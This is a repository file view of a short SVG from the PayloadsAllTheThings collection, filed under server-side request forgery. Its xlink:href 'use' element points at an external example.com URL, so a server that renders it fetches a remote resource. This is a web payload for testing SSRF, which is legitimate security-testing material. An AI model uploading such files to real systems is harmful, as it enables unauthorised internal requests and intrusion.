PayloadsAllTheThings/Server Side Request Forgery/Files/ssrf_svg_use.svg

4 lines
176 B
XML
Raw Normal View History

2019-08-15 16:21:06 +00:00
<svg width="200" height="200"
xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<use xlink:href="https://example.com/file2.svg#foo"/>
</svg>